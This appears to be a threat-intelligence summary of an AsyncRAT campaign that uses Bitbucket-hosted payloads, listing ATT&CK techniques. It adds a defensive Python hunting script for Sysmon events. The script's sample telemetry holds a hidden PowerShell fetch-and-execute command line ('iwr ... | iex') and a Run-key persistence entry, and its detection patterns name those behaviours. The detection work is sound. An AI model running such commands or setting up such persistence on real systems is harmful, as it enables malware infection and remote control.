Malware by the (Bit)Bucket: Uncovering AsyncRAT

Oct. 11, 2024, 8:10 a.m.

Description

An attack campaign that uses Bitbucket, a legitimate code-hosting platform, to deliver AsyncRAT has been uncovered. The multi-stage chain starts with an obfuscated VBScript, hands off to a PowerShell stage that retrieves the next payload, and ends with the execution of AsyncRAT. The attackers abuse Bitbucket's reputation and accessibility to host the malicious payloads, so that the download traffic looks like ordinary use of a trusted service. The campaign employs several evasion techniques, including anti-VM checks and obfuscation. Persistence is established through Registry Run keys and Startup folder shortcuts. AsyncRAT gives the operators extensive control over infected machines, including remote desktop control, file management, keylogging, and more. The campaign shows a high level of sophistication in its combination of a legitimate hosting platform with multi-layered obfuscation.
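As an added illustration of what the chain described above looks like in endpoint telemetry, the following Python runs three hunting rules over Sysmon-style events: a script host (wscript.exe/cscript.exe) spawning PowerShell with a Bitbucket URL on its command line, a Registry Run key whose value points at a script host, a .vbs file or PowerShell, and a Startup-folder .lnk written by a script host or PowerShell. This is example code written for this page, not code from the original report or from the campaign; the event layout, the sample command lines, the workspace and repository path, the user SID and the file names are all constructed for the example.

```python
"""Hunt for the VBScript -> PowerShell -> persistence chain in Sysmon-style
process, registry and file events.

Added example, not code from the original report. The events below are
constructed; the field names (EventID, Image, ParentImage, CommandLine,
TargetObject, Details, TargetFilename) follow Sysmon's naming, but the
dict layout is an assumption of this example, not a real export format.
"""
import re
from typing import Optional

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Registry Run / RunOnce keys (Sysmon Event ID 13: registry value set).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# A .lnk written into a per-user or all-users Startup folder (Event ID 11).
STARTUP_LNK_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
# Payload retrieval from Bitbucket inside a PowerShell command line.
BITBUCKET_RE = re.compile(r"https?://(api\.)?bitbucket\.org/", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if the path is empty)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> Optional[str]:
    """Return a finding label for one event, or None if nothing matched."""
    eid = ev.get("EventID")
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    # Stage 1 -> stage 2: a script host spawning PowerShell. The Bitbucket
    # URL alone is not an indicator (legitimate downloads exist); the
    # parent/child relationship is what makes it worth a look.
    if eid == 1 and image in POWERSHELL and parent in SCRIPT_HOSTS:
        if BITBUCKET_RE.search(ev.get("CommandLine", "")):
            return "delivery: script host launched PowerShell fetching from Bitbucket"
        return "suspicious: script host launched PowerShell"
    # Persistence via a Run key whose value points at a script host,
    # a .vbs file or PowerShell.
    if eid == 13 and RUN_KEY_RE.search(ev.get("TargetObject", "")):
        details = ev.get("Details", "").lower()
        if any(tok in details for tok in SCRIPT_HOSTS + POWERSHELL + (".vbs",)):
            return "persistence: Run key value points at a script host or PowerShell"
    # Persistence via a Startup-folder shortcut dropped by a script host or PowerShell.
    if eid == 11 and STARTUP_LNK_RE.search(ev.get("TargetFilename", "")):
        if image in SCRIPT_HOSTS + POWERSHELL:
            return "persistence: Startup folder shortcut written by a script host or PowerShell"
    return None


def hunt(events: list) -> list:
    """Return (event index, finding) pairs for every event that matched."""
    return [(i, hit) for i, ev in enumerate(events) if (hit := classify(ev)) is not None]


# Constructed sample telemetry: one benign PowerShell launch, the three
# stages of the chain, and one benign Run key from an installed product.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr https://bitbucket.org/example-ws/example-repo/downloads/stage2.txt | iex"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"wscript.exe //B C:\Users\Public\update.vbs"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

if __name__ == "__main__":
    for index, finding in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

Run against the constructed events, the rules flag the wscript-to-PowerShell launch, the Run key pointing at update.vbs and the Startup-folder shortcut, and leave the explorer-launched PowerShell and the vendor Run key alone. In a real deployment the same three rules map onto Sysmon Event IDs 1, 13 and 11 (or the equivalent EDR events) and should be joined on host and user so that the stage-2 launch and the persistence writes from the same session surface together.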

Date

Published: Oct. 10, 2024, 4:05 p.m.

Created: Oct. 10, 2024, 4:05 p.m.

Modified: Oct. 11, 2024, 8:10 a.m.

Attack Patterns

AsyncRAT

T1021.001 (Remote Services: Remote Desktop Protocol)

T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

T1059.001 (Command and Scripting Interpreter: PowerShell)

T1497 (Virtualization/Sandbox Evasion)

T1056.001 (Input Capture: Keylogging)

T1113 (Screen Capture)

T1486 (Data Encrypted for Impact)

T1547 (Boot or Logon Autostart Execution)

T1055 (Process Injection)

T1219 (Remote Access Software)

T1036 (Masquerading)

T1140 (Deobfuscate/Decode Files or Information)

T1027 (Obfuscated Files or Information)

T1041 (Exfiltration Over C2 Channel)

T1003 (OS Credential Dumping)